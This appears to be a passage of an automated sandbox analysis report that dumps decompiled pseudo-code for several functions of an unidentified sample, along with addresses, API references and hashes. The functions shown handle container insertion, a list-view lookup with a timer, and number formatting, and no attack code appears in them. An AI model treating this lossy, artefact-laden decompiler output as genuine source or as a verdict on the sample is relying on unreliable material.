                                                                                                                              0x00405949
                                                                                                                              0x00405949
                                                                                                                              0x00405950
                                                                                                                              0x0040596b
                                                                                                                              0x0040596e
                                                                                                                              0x00405970
                                                                                                                              0x00405975
                                                                                                                              0x00405975
                                                                                                                              0x0040597d
                                                                                                                              0x00405986
                                                                                                                              0x00405993
                                                                                                                              0x00405952
                                                                                                                              0x00405952
                                                                                                                              0x00405955
                                                                                                                              0x0040595d
                                                                                                                              0x00405963
                                                                                                                              0x00405963
                                                                                                                              0x00405950
                                                                                                                              0x00405a1c
                                                                                                                              0x00405a1c
                                                                                                                              0x00405a1c
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 004058C9
                                                                                                                                • Part of subcall function 0041ADC6: RaiseException.KERNEL32(?,?,0041ADC5,?,?,?,?,?,0041ADC5,?,00436E98,0043C118), ref: 0041AE06
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionException@8RaiseThrow
                                                                                                                              • String ID: T#C$map/set<T> too long
                                                                                                                              • API String ID: 3976011213-2329613055
                                                                                                                              • Opcode ID: e6271aa25d93512708e50843bce19f7072a2b7d6576bbc666f2a604042ea88cb
                                                                                                                              • Instruction ID: 142b584ec654a9f7bcf044709d634f6719e1c7928e95ddf70cc368ba690d1774
                                                                                                                              • Opcode Fuzzy Hash: e6271aa25d93512708e50843bce19f7072a2b7d6576bbc666f2a604042ea88cb
                                                                                                                              • Instruction Fuzzy Hash: 8A7155B4604A41DFC310CF14C180A56FBE1FB89314F65869EE8896B792C734EC82CF99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004111D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 49%
                                                                                                                              			E004111D0(void __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				signed int _t64;
				intOrPtr _t69;
				void* _t74;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t92;
				intOrPtr* _t93;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				void* _t124;
				void _t126;
				signed int _t128;
				void* _t130;

				_push(0xffffffff);
				_push(E00430ACE);
				_push( *[fs:0x0]);
				E0041B900(0x105c);
				_t62 =  *0x43a6a8; // 0x2a5cd135
				 *(_t128 + 0x1058) = _t62 ^ _t128;
				_t64 =  *0x43a6a8; // 0x2a5cd135
				_push(_t64 ^ _t128);
				 *[fs:0x0] = _t128 + 0x1070;
				_t118 =  *((intOrPtr*)(_t128 + 0x1080));
				_t126 = __ecx;
				_t121 =  *((intOrPtr*)(__ecx + 4));
				 *((intOrPtr*)(_t128 + 0x14)) =  *((intOrPtr*)(_t128 + 0x1084));
				_t69 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t69 == 0) {
					L17:
					 *[fs:0x0] =  *((intOrPtr*)(_t128 + 0x1070));
					_pop(_t119);
					_pop(_t122);
					_pop(_t92);
					return E0041B3F9(_t69, _t92,  *(_t128 + 0x1058) ^ _t128, _t111, _t119, _t122);
				}
				_push(0x6f);
				_push(_t121);
				_t123 = _t69;
				_t128 = _t128 + 8;
				if(_t123 == 0) {
					goto L17;
				}
				 *((intOrPtr*)(_t128 + 0x20)) = 0;
				 *((intOrPtr*)(_t128 + 0x24)) = 0;
				 *((intOrPtr*)(_t128 + 0x2c)) = 0;
				 *((intOrPtr*)(_t128 + 0x30)) = 0;
				 *((intOrPtr*)(_t128 + 0x34)) = 0;
				 *((intOrPtr*)(_t128 + 0x38)) = 0;
				 *((intOrPtr*)(_t128 + 0x3c)) = 0;
				 *((intOrPtr*)(_t128 + 0x40)) = 0;
				 *((intOrPtr*)(_t128 + 0x44)) = 0;
				 *((intOrPtr*)(_t128 + 0x48)) = 0;
				 *((intOrPtr*)(_t128 + 0x28)) =  *((intOrPtr*)(_t118 + 0xc));
				 *((intOrPtr*)(_t128 + 0x24)) = 1;
				E0041B880(_t118, _t128 + 0x74, 0, 0x400);
				_t93 =  *0x43babc; // 0x418f08
				_t130 = _t128 + 0xc;
				 *((intOrPtr*)(_t130 + 0x3c)) = _t130 + 0x78;
				 *((intOrPtr*)(_t130 + 0x40)) = 0x400;
				_t74 =  *_t93(_t123, 0x104b, 0, _t130 + 0x18);
				if(_t74 == 0) {
					 *0x43bab8(_t74, L"Get Item Failed", 0x432444, _t74);
				}
				E0041B880(_t118, _t130 + 0x870, 0, 0x400);
				_t128 = _t130 + 0xc;
				_t114 = _t128 + 0x40;
				 *((intOrPtr*)(_t128 + 0x48)) = 0;
				 *((intOrPtr*)(_t128 + 0x4c)) = 0;
				 *((intOrPtr*)(_t128 + 0x50)) = 0;
				 *((intOrPtr*)(_t128 + 0x5c)) = 0;
				 *((intOrPtr*)(_t128 + 0x60)) = 0;
				 *((intOrPtr*)(_t128 + 0x54)) = 0;
				 *((intOrPtr*)(_t128 + 0x58)) = 0;
				 *((intOrPtr*)(_t128 + 0x64)) = 0;
				 *((intOrPtr*)(_t128 + 0x68)) = 0;
				 *((intOrPtr*)(_t128 + 0x6c)) = 0;
				 *((intOrPtr*)(_t128 + 0x54)) =  *((intOrPtr*)(_t118 + 0xc));
				 *((intOrPtr*)(_t128 + 0x58)) = 1;
				 *((intOrPtr*)(_t128 + 0x50)) = 3;
				 *((intOrPtr*)(_t128 + 0x64)) = _t128 + 0x878;
				 *((intOrPtr*)(_t128 + 0x68)) = 0x400;
				_t78 =  *_t93(_t123, 0x104b, 0, _t128 + 0x40);
				if(_t78 == 0) {
					 *0x43bab8(_t78, L"Get Item Failed", 0x432444, _t78);
				}
				_t79 =  *((intOrPtr*)(_t128 + 0x5c));
				_t136 = _t79 - 2;
				if(_t79 != 2) {
					__eflags = _t79 - 1;
					if(__eflags == 0) {
						E00410D30(_t126,  *((intOrPtr*)(_t128 + 0x2c)),  *((intOrPtr*)(_t118 + 0xc)));
					}
				} else {
					_push(0x810);
					_t82 = E0041AD5C(_t93, _t114, _t118, _t123, _t136);
					_t128 = _t128 + 4;
					 *((intOrPtr*)(_t128 + 0x68)) = _t82;
					_t137 = _t82;
					 *((intOrPtr*)(_t128 + 0x1078)) = 0;
					if(_t82 == 0) {
						_t124 = 0;
						__eflags = 0;
					} else {
						_t124 = E0040D480(_t82,  *((intOrPtr*)(_t126 + 0xc)),  *((intOrPtr*)(_t128 + 0x2c)));
					}
					 *((intOrPtr*)(_t128 + 0x107c)) = 0xffffffff;
					if(E0040E0C0(_t124, _t137,  *((intOrPtr*)(_t126 + 4))) != 0) {
						E00410D30(_t126,  *((intOrPtr*)(_t128 + 0x2c)),  *((intOrPtr*)(_t118 + 0xc)));
					}
					_t139 = _t124;
					if(_t124 != 0) {
						E0040D4C0(_t124);
						_push(_t124);
						L0041A97D(_t93, _t118, _t124, _t139);
						_t128 = _t128 + 4;
					}
				}
				_t69 = E0040F1B0(_t93, _t126, _t139);
				_t111 =  *((intOrPtr*)(_t128 + 0x14));
				 *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x14)))) = 0;
				goto L17;
			}
























                                                                                                                              0x004111d0
                                                                                                                              0x004111d2
                                                                                                                              0x004111dd
                                                                                                                              0x004111e3
                                                                                                                              0x004111e8
                                                                                                                              0x004111ef
                                                                                                                              0x004111fa
                                                                                                                              0x00411201
                                                                                                                              0x00411209
                                                                                                                              0x00411216
                                                                                                                              0x0041121d
                                                                                                                              0x0041121f
                                                                                                                              0x00411222
                                                                                                                              0x0041122b
                                                                                                                              0x00411230
                                                                                                                              0x00411404
                                                                                                                              0x0041140b
                                                                                                                              0x00411413
                                                                                                                              0x00411414
                                                                                                                              0x00411416
                                                                                                                              0x0041142b
                                                                                                                              0x0041142b
                                                                                                                              0x00411236
                                                                                                                              0x00411238
                                                                                                                              0x0041123b
                                                                                                                              0x0041123d
                                                                                                                              0x00411242
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00411257
                                                                                                                              0x0041125b
                                                                                                                              0x00411260
                                                                                                                              0x00411264
                                                                                                                              0x00411268
                                                                                                                              0x0041126c
                                                                                                                              0x00411270
                                                                                                                              0x00411274
                                                                                                                              0x00411278
                                                                                                                              0x0041127c
                                                                                                                              0x00411280
                                                                                                                              0x00411284
                                                                                                                              0x0041128c
                                                                                                                              0x00411291
                                                                                                                              0x00411297
                                                                                                                              0x004112ab
                                                                                                                              0x004112af
                                                                                                                              0x004112b7
                                                                                                                              0x004112bb
                                                                                                                              0x004112c9
                                                                                                                              0x004112c9
                                                                                                                              0x004112de
                                                                                                                              0x004112e5
                                                                                                                              0x004112e8
                                                                                                                              0x004112ef
                                                                                                                              0x004112f3
                                                                                                                              0x004112f7
                                                                                                                              0x004112fb
                                                                                                                              0x004112ff
                                                                                                                              0x00411303
                                                                                                                              0x00411307
                                                                                                                              0x0041130b
                                                                                                                              0x0041130f
                                                                                                                              0x00411313
                                                                                                                              0x00411327
                                                                                                                              0x0041132b
                                                                                                                              0x00411333
                                                                                                                              0x0041133b
                                                                                                                              0x0041133f
                                                                                                                              0x00411347
                                                                                                                              0x0041134b
                                                                                                                              0x00411359
                                                                                                                              0x00411359
                                                                                                                              0x0041135f
                                                                                                                              0x00411363
                                                                                                                              0x00411366
                                                                                                                              0x004113de
                                                                                                                              0x004113e1
                                                                                                                              0x004113ee
                                                                                                                              0x004113ee
                                                                                                                              0x00411368
                                                                                                                              0x00411368
                                                                                                                              0x0041136d
                                                                                                                              0x00411372
                                                                                                                              0x00411375
                                                                                                                              0x00411379
                                                                                                                              0x0041137b
                                                                                                                              0x00411386
                                                                                                                              0x0041139c
                                                                                                                              0x0041139c
                                                                                                                              0x00411388
                                                                                                                              0x00411398
                                                                                                                              0x00411398
                                                                                                                              0x004113a4
                                                                                                                              0x004113b6
                                                                                                                              0x004113c3
                                                                                                                              0x004113c3
                                                                                                                              0x004113c8
                                                                                                                              0x004113ca
                                                                                                                              0x004113ce
                                                                                                                              0x004113d3
                                                                                                                              0x004113d4
                                                                                                                              0x004113d9
                                                                                                                              0x004113d9
                                                                                                                              0x004113ca
                                                                                                                              0x004113f5
                                                                                                                              0x004113fa
                                                                                                                              0x004113fe
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041128C
                                                                                                                              • _memset.LIBCMT ref: 004112DE
                                                                                                                                • Part of subcall function 00410D30: SetTimer.USER32(?,00000001,000001F4,00000000), ref: 00410D40
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$Timer
                                                                                                                              • String ID: Get Item Failed
                                                                                                                              • API String ID: 719689806-80615001
                                                                                                                              • Opcode ID: cd24e282e28505aac5dfea2929dfe1a2f0195918b6f3de9a5be92aa7f6135584
                                                                                                                              • Instruction ID: d64d3374e3844e212e41c5849216af510a4b9aaccf9752e3bab8d7214acf93f5
                                                                                                                              • Opcode Fuzzy Hash: cd24e282e28505aac5dfea2929dfe1a2f0195918b6f3de9a5be92aa7f6135584
                                                                                                                              • Instruction Fuzzy Hash: E6612DB19087409FD350DF69D841B9BB7E4EB88714F10492EFA98D7390E7B8D884CB96
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004047A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 95%
                                                                                                                              			E004047A0(intOrPtr __ecx, void* __edx) {
				signed int _t82;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr _t94;
				intOrPtr* _t100;
				intOrPtr* _t112;
				intOrPtr* _t114;
				void* _t126;
				intOrPtr* _t130;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr* _t137;
				intOrPtr _t140;
				intOrPtr _t145;
				intOrPtr* _t148;
				intOrPtr _t149;
				intOrPtr _t153;
				void* _t155;
				signed int _t156;

				_t126 = __edx;
				_t109 = __ecx;
				_push(0xffffffff);
				_push(E0042FFC8);
				_push( *[fs:0x0]);
				_t156 = _t155 - 0x44;
				_t82 =  *0x43a6a8; // 0x2a5cd135
				_push(_t82 ^ _t156);
				 *[fs:0x0] = _t156 + 0x58;
				_t145 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) >= 0x15555554) {
					 *((intOrPtr*)(_t156 + 0x34)) = 0xf;
					 *((intOrPtr*)(_t156 + 0x30)) = 0;
					 *((char*)(_t156 + 0x20)) = 0;
					E00401A00(_t156 + 0x1c, "map/set<T> too long", 0x13);
					 *((intOrPtr*)(_t156 + 0x64)) = 0;
					E00401EC0(_t126, 0, _t156 + 0x14);
					_t109 = _t156 + 0x34;
					 *((intOrPtr*)(_t156 + 0x38)) = 0x432354;
					E0041ADC6(_t156 + 0x34, 0x437064);
				}
				_t148 =  *((intOrPtr*)(_t156 + 0x70));
				_t153 = E00404490(_t109,  *((intOrPtr*)(_t145 + 4)), _t148,  *((intOrPtr*)(_t145 + 4)),  *((intOrPtr*)(_t156 + 0x74)), 0);
				_t87 =  *((intOrPtr*)(_t145 + 4));
				 *((intOrPtr*)(_t145 + 8)) =  *((intOrPtr*)(_t145 + 8)) + 1;
				if(_t148 != _t87) {
					__eflags =  *((char*)(_t156 + 0x6c));
					if( *((char*)(_t156 + 0x6c)) == 0) {
						 *((intOrPtr*)(_t148 + 8)) = _t153;
						_t88 =  *((intOrPtr*)(_t145 + 4));
						__eflags = _t148 -  *((intOrPtr*)(_t88 + 8));
						if(_t148 ==  *((intOrPtr*)(_t88 + 8))) {
							 *((intOrPtr*)(_t88 + 8)) = _t153;
						}
					} else {
						 *_t148 = _t153;
						_t100 =  *((intOrPtr*)(_t145 + 4));
						__eflags = _t148 -  *_t100;
						if(_t148 ==  *_t100) {
							 *_t100 = _t153;
						}
					}
				} else {
					 *((intOrPtr*)(_t87 + 4)) = _t153;
					 *((intOrPtr*)( *((intOrPtr*)(_t145 + 4)))) = _t153;
					 *((intOrPtr*)( *((intOrPtr*)(_t145 + 4)) + 8)) = _t153;
				}
				_t30 = _t153 + 4; // 0x4
				_t89 = _t30;
				_t149 = _t153;
				if( *((char*)( *((intOrPtr*)(_t153 + 4)) + 0x18)) != 0) {
					L30:
					 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t145 + 4)) + 4)) + 0x18)) = 1;
					_t91 =  *((intOrPtr*)(_t156 + 0x68));
					 *((intOrPtr*)(_t91 + 4)) = _t153;
					 *_t91 = _t145;
					 *[fs:0x0] =  *((intOrPtr*)(_t156 + 0x58));
					return _t91;
				}
				do {
					_t112 =  *_t89;
					_t130 =  *((intOrPtr*)(_t112 + 4));
					if(_t112 !=  *_t130) {
						_t131 =  *_t130;
						__eflags =  *((char*)(_t131 + 0x18));
						if( *((char*)(_t131 + 0x18)) != 0) {
							__eflags = _t149 -  *_t112;
							if(_t149 ==  *_t112) {
								_t149 = _t112;
								E00404370(_t145, _t149);
							}
							 *((char*)( *((intOrPtr*)(_t149 + 4)) + 0x18)) = 1;
							 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t149 + 4)) + 4)) + 0x18)) = 0;
							_t94 =  *((intOrPtr*)( *((intOrPtr*)(_t149 + 4)) + 4));
							_t114 =  *((intOrPtr*)(_t94 + 8));
							 *((intOrPtr*)(_t94 + 8)) =  *_t114;
							_t134 =  *_t114;
							__eflags =  *((char*)(_t134 + 0x19));
							if( *((char*)(_t134 + 0x19)) == 0) {
								 *((intOrPtr*)(_t134 + 4)) = _t94;
							}
							 *((intOrPtr*)(_t114 + 4)) =  *((intOrPtr*)(_t94 + 4));
							_t136 =  *((intOrPtr*)(_t145 + 4));
							__eflags = _t94 -  *((intOrPtr*)(_t136 + 4));
							if(_t94 !=  *((intOrPtr*)(_t136 + 4))) {
								_t137 =  *((intOrPtr*)(_t94 + 4));
								__eflags = _t94 -  *_t137;
								if(_t94 !=  *_t137) {
									 *((intOrPtr*)(_t137 + 8)) = _t114;
								} else {
									 *_t137 = _t114;
								}
							} else {
								 *((intOrPtr*)(_t136 + 4)) = _t114;
							}
							 *_t114 = _t94;
							 *((intOrPtr*)(_t94 + 4)) = _t114;
						} else {
							 *((char*)(_t112 + 0x18)) = 1;
							 *((char*)(_t131 + 0x18)) = 1;
							 *((char*)( *((intOrPtr*)( *_t89 + 4)) + 0x18)) = 0;
							_t149 =  *((intOrPtr*)( *_t89 + 4));
						}
					} else {
						_t140 =  *((intOrPtr*)(_t130 + 8));
						if( *((char*)(_t140 + 0x18)) != 0) {
							__eflags = _t149 -  *((intOrPtr*)(_t112 + 8));
							if(_t149 ==  *((intOrPtr*)(_t112 + 8))) {
								_t149 = _t112;
								E00404320(_t145, _t149);
							}
							 *((char*)( *((intOrPtr*)(_t149 + 4)) + 0x18)) = 1;
							 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t149 + 4)) + 4)) + 0x18)) = 0;
							E00404370(_t145,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 4)) + 4)));
						} else {
							 *((char*)(_t112 + 0x18)) = 1;
							 *((char*)(_t140 + 0x18)) = 1;
							 *((char*)( *((intOrPtr*)( *_t89 + 4)) + 0x18)) = 0;
							_t149 =  *((intOrPtr*)( *_t89 + 4));
						}
					}
					_t74 = _t149 + 4; // 0x4
					_t89 = _t74;
				} while ( *((char*)( *((intOrPtr*)(_t149 + 4)) + 0x18)) == 0);
				goto L30;
			}

























                                                                                                                              0x004047a0
                                                                                                                              0x004047a0
                                                                                                                              0x004047a0
                                                                                                                              0x004047a2
                                                                                                                              0x004047ad
                                                                                                                              0x004047ae
                                                                                                                              0x004047b5
                                                                                                                              0x004047bc
                                                                                                                              0x004047c1
                                                                                                                              0x004047c7
                                                                                                                              0x004047d0
                                                                                                                              0x004047df
                                                                                                                              0x004047e7
                                                                                                                              0x004047eb
                                                                                                                              0x004047f0
                                                                                                                              0x004047fe
                                                                                                                              0x00404802
                                                                                                                              0x0040480c
                                                                                                                              0x00404811
                                                                                                                              0x00404819
                                                                                                                              0x00404819
                                                                                                                              0x00404825
                                                                                                                              0x00404834
                                                                                                                              0x00404836
                                                                                                                              0x0040483e
                                                                                                                              0x00404843
                                                                                                                              0x00404855
                                                                                                                              0x0040485a
                                                                                                                              0x00404869
                                                                                                                              0x0040486c
                                                                                                                              0x0040486f
                                                                                                                              0x00404872
                                                                                                                              0x00404874
                                                                                                                              0x00404874
                                                                                                                              0x0040485c
                                                                                                                              0x0040485c
                                                                                                                              0x0040485e
                                                                                                                              0x00404861
                                                                                                                              0x00404863
                                                                                                                              0x00404865
                                                                                                                              0x00404865
                                                                                                                              0x00404863
                                                                                                                              0x00404845
                                                                                                                              0x00404845
                                                                                                                              0x0040484b
                                                                                                                              0x00404850
                                                                                                                              0x00404850
                                                                                                                              0x0040487e
                                                                                                                              0x0040487e
                                                                                                                              0x00404881
                                                                                                                              0x00404883
                                                                                                                              0x00404975
                                                                                                                              0x0040497b
                                                                                                                              0x0040497e
                                                                                                                              0x00404982
                                                                                                                              0x00404985
                                                                                                                              0x0040498b
                                                                                                                              0x0040499a
                                                                                                                              0x0040499a
                                                                                                                              0x00404890
                                                                                                                              0x00404890
                                                                                                                              0x00404892
                                                                                                                              0x00404897
                                                                                                                              0x004048ea
                                                                                                                              0x004048ec
                                                                                                                              0x004048f0
                                                                                                                              0x00404908
                                                                                                                              0x0040490a
                                                                                                                              0x0040490c
                                                                                                                              0x00404911
                                                                                                                              0x00404911
                                                                                                                              0x00404919
                                                                                                                              0x00404922
                                                                                                                              0x00404929
                                                                                                                              0x0040492c
                                                                                                                              0x00404931
                                                                                                                              0x00404934
                                                                                                                              0x00404936
                                                                                                                              0x0040493a
                                                                                                                              0x0040493c
                                                                                                                              0x0040493c
                                                                                                                              0x00404942
                                                                                                                              0x00404945
                                                                                                                              0x00404948
                                                                                                                              0x0040494b
                                                                                                                              0x00404952
                                                                                                                              0x00404955
                                                                                                                              0x00404957
                                                                                                                              0x0040495d
                                                                                                                              0x00404959
                                                                                                                              0x00404959
                                                                                                                              0x00404959
                                                                                                                              0x0040494d
                                                                                                                              0x0040494d
                                                                                                                              0x0040494d
                                                                                                                              0x00404960
                                                                                                                              0x00404962
                                                                                                                              0x004048f2
                                                                                                                              0x004048f2
                                                                                                                              0x004048f5
                                                                                                                              0x004048fd
                                                                                                                              0x00404903
                                                                                                                              0x00404903
                                                                                                                              0x00404899
                                                                                                                              0x00404899
                                                                                                                              0x004048a0
                                                                                                                              0x004048bb
                                                                                                                              0x004048be
                                                                                                                              0x004048c0
                                                                                                                              0x004048c5
                                                                                                                              0x004048c5
                                                                                                                              0x004048cd
                                                                                                                              0x004048d6
                                                                                                                              0x004048e3
                                                                                                                              0x004048a2
                                                                                                                              0x004048a2
                                                                                                                              0x004048a5
                                                                                                                              0x004048ad
                                                                                                                              0x004048b3
                                                                                                                              0x004048b3
                                                                                                                              0x004048a0
                                                                                                                              0x0040496c
                                                                                                                              0x0040496c
                                                                                                                              0x0040496c
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00404819
                                                                                                                                • Part of subcall function 0041ADC6: RaiseException.KERNEL32(?,?,0041ADC5,?,?,?,?,?,0041ADC5,?,00436E98,0043C118), ref: 0041AE06
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionException@8RaiseThrow
                                                                                                                              • String ID: T#C$map/set<T> too long
                                                                                                                              • API String ID: 3976011213-2329613055
                                                                                                                              • Opcode ID: aaeb7e1cd4389c98ab0e5323e083fe9adc1bb944947fcd4747019ad96561dcf1
                                                                                                                              • Instruction ID: 73aca59f1d5920ad871d268e48589c3b3cfdd6fbff9cc7213c86fb0071310192
                                                                                                                              • Opcode Fuzzy Hash: aaeb7e1cd4389c98ab0e5323e083fe9adc1bb944947fcd4747019ad96561dcf1
                                                                                                                              • Instruction Fuzzy Hash: 207156B5604281DFC314DF14C180A26FBE1BB99714F65C6AEE5996B3A2C734EC82CBC5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00417C40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 60%
                                                                                                                              			E00417C40(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				intOrPtr _t54;
				signed char _t56;
				char* _t57;
				char* _t58;
				char* _t59;
				char* _t60;
				void* _t61;
				signed long long* _t63;
				char _t69;
				intOrPtr _t70;
				signed int _t72;
				signed int _t73;
				char _t75;
				intOrPtr _t81;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				void* _t90;
				intOrPtr _t92;
				intOrPtr _t94;
				signed int _t96;
				signed long long* _t97;
				signed long long* _t98;
				signed long long* _t99;
				signed long long _t118;

				_t51 =  *0x43a6a8; // 0x2a5cd135
				 *(_t96 + 0x80) = _t51 ^ _t96;
				_t94 =  *((intOrPtr*)(_t96 + 0xa0));
				 *((intOrPtr*)(_t96 + 0x10)) =  *((intOrPtr*)(_t96 + 0x88));
				_t54 =  *((intOrPtr*)(_t94 + 0x14));
				 *((intOrPtr*)(_t96 + 0x14)) = __ecx;
				if(_t54 <= 0 && ( *(_t94 + 0x10) & 0x00002000) == 0) {
					_t54 = 6;
				}
				_t89 = _t54;
				_t81 = 0x24;
				if(_t89 <= 0x24) {
					_t81 = _t89;
				}
				_t72 =  *(_t94 + 0x10);
				_t56 = _t72 & 0x00003000;
				_t90 = _t89 - _t81;
				_t69 = 0;
				_t86 = 0;
				if(_t56 != 0x2000) {
					_t118 =  *(_t96 + 0xb0);
					goto L27;
				} else {
					asm("fldz");
					asm("fcom st0, st1");
					asm("fnstsw ax");
					if((_t56 & 0x00000005) != 0) {
						 *((char*)(_t96 + 0x13)) = 0;
					} else {
						 *((char*)(_t96 + 0x13)) = 1;
						asm("fchs");
					}
					asm("fcom st0, st1");
					asm("fnstsw ax");
					_t118 =  *0x433798;
					if((_t56 & 0x00000041) != 0) {
						while(1) {
							__eflags = _t69 - 0x1388;
							if(__eflags >= 0) {
								goto L9;
							}
							_t118 = _t118 / st0;
							_t69 = _t69 + 0xa;
							asm("fxch st0, st1");
							asm("fcom st0, st2");
							asm("fnstsw ax");
							__eflags = _t56 & 0x00000041;
							if(__eflags != 0) {
								asm("fxch st0, st1");
								continue;
							}
							st0 = _t118;
							goto L15;
						}
						goto L9;
					} else {
						L9:
						st1 = _t118;
						L15:
						asm("fxch st0, st2");
						asm("fcomp st0, st1");
						asm("fnstsw ax");
						if((_t56 & 0x00000005) != 0 || _t90 < 0xa) {
							L23:
							st1 = _t118;
							if( *((char*)(_t96 + 0x13)) != 0) {
								asm("fchs");
							}
							L27:
							 *((char*)(_t96 + 0x1c)) = 0x25;
							_t57 = _t96 + 0x1d;
							if((_t72 & 0x00000020) != 0) {
								 *((char*)(_t96 + 0x1d)) = 0x2b;
								_t57 = _t96 + 0x1e;
							}
							if((_t72 & 0x00000010) != 0) {
								 *_t57 = 0x23;
								_t57 = _t57 + 1;
							}
							 *_t57 = 0x2e;
							_t58 = _t57 + 1;
							 *_t58 = 0x2a;
							_t59 = _t58 + 1;
							 *_t59 = 0x4c;
							_t73 = _t72 & 0x00003000;
							_t60 = _t59 + 1;
							_t116 = _t73 - 0x2000;
							if(_t73 != 0x2000) {
								__eflags = _t73 - 0x1000;
								_t35 = _t73 != 0x1000;
								__eflags = _t35;
								_t75 = (_t73 & 0xffffff00 | _t35) + (_t73 & 0xffffff00 | _t35) + 0x65;
							} else {
								_t75 = 0x66;
							}
							_t97 = _t96 - 8;
							 *_t97 = _t118;
							 *_t60 = _t75;
							 *((char*)(_t60 + 1)) = 0;
							_t61 = E0041BFA6( &(_t97[6]), 0x6c,  &(_t97[5]), _t81);
							_t98 =  &(_t97[3]);
							_push(_t61);
							_push(_t90);
							_push(_t86);
							_push(_t69);
							_push( &(_t98[6]));
							_push(_t97[0x18]);
							_t99 = _t98 - 0xc;
							_t63 = _t99;
							 *_t63 = _t97[0x16];
							_t63[0] = _t98[0x17];
							_t63[1] = _t99[0x19];
							_push(_t98[4]);
							_push(_t99[7]);
							E004168A0(_t116);
							_pop(_t87);
							_pop(_t92);
							_t70 = _t94;
							return E0041B3F9(_t98[4], _t70, _t99[0x18] ^  &(_t99[6]), _t99[0x19], _t87, _t92);
						} else {
							_t118 =  *0x433790;
							while(1) {
								asm("fcom st0, st1");
								asm("fnstsw ax");
								if((_t56 & 0x00000001) != 0 || _t86 >= 0x1388) {
									break;
								}
								_t90 = _t90 - 0xa;
								asm("fxch st0, st1");
								_t86 = _t86 + 0xa;
								_t118 = _t118 * st2;
								if(_t90 >= 0xa) {
									asm("fxch st0, st1");
									continue;
								}
								st1 = _t118;
								goto L23;
							}
							st0 = _t118;
							goto L23;
						}
					}
				}
			}
































                                                                                                                              0x00417c46
                                                                                                                              0x00417c4d
                                                                                                                              0x00417c5d
                                                                                                                              0x00417c64
                                                                                                                              0x00417c68
                                                                                                                              0x00417c6f
                                                                                                                              0x00417c73
                                                                                                                              0x00417c7e
                                                                                                                              0x00417c7e
                                                                                                                              0x00417c83
                                                                                                                              0x00417c88
